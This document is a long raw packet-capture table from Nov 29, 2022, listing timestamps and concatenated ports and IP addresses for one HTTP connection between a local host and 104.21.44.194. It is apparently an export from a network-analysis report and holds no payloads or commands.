                                                                          Nov 29, 2022 09:20:40.545315981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545327902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545339108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545350075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545360088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545367002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545372963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545383930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545393944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545404911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545414925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545425892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545439005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545449972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545516968 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545516968 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545517921 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545536041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545542002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545547009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545557022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545567989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545578957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545684099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545684099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545684099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545684099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545830965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545842886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545860052 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545861006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.545867920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545878887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545890093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545900106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545911074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545922041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545932055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545943022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.546020985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.546091080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.546190023 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.546376944 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.547702074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547813892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547826052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547866106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.547951937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547964096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547974110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.547985077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548022985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548079014 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548079014 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548110008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548121929 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548188925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548226118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548226118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548226118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548226118 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548300982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548320055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548376083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548420906 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548450947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548588991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548616886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548628092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548639059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548650026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548660040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548671007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548687935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548698902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548710108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548719883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548729897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548741102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548751116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548757076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548757076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548757076 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548762083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548773050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548783064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548794031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548804045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548835993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548846960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548857927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548868895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548888922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548899889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548909903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548929930 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548942089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548945904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548945904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548945904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548945904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548945904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.548953056 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548963070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548974037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.548995018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549047947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549058914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549098015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549098969 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549108982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549113989 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549119949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549129963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549139977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549149990 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549206972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549217939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549228907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549238920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549246073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549246073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549246073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549246073 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549249887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.549410105 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549410105 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.549580097 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.568830013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.568945885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.568957090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.568968058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.568979025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569015026 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569034100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569061041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569092989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569104910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569130898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569144011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569154978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569165945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569176912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569189072 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569200993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569238901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569238901 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569360971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569372892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569384098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569400072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569408894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569420099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569443941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569457054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569468975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569478989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569489002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569499969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569511890 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569523096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569534063 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569545031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569552898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569564104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569575071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.569580078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569580078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569580078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.569580078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615025997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615030050 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615037918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615050077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615062952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615075111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615081072 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615087032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615098953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615112066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615123987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615135908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615148067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615160942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615173101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615185022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615199089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615211010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615223885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615236044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615250111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615252972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615262985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615274906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615288019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615298033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615302086 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615314960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615326881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615339041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615350962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615362883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615375996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615387917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615400076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615411997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615423918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615436077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615448952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615461111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615468025 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468025 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615468979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615473032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615484953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615497112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615509033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615521908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615534067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615545988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615557909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615570068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615581989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615602970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615616083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615628958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615641117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615643978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615653992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615665913 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615679979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615693092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615705967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615731955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615744114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615756035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615767956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615778923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615791082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615803003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615812063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615812063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615812063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615812063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615812063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.615813971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615825891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615838051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615849972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615860939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615873098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615885019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615909100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615921974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615933895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615947008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615972042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615983963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.615995884 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616008043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616019011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616030931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616029024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616043091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616055012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616065979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616077900 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616089106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616100073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616111994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616122961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616134882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616146088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616158009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616169930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616195917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.616202116 CET4985280192.168.11.20104.21.44.194
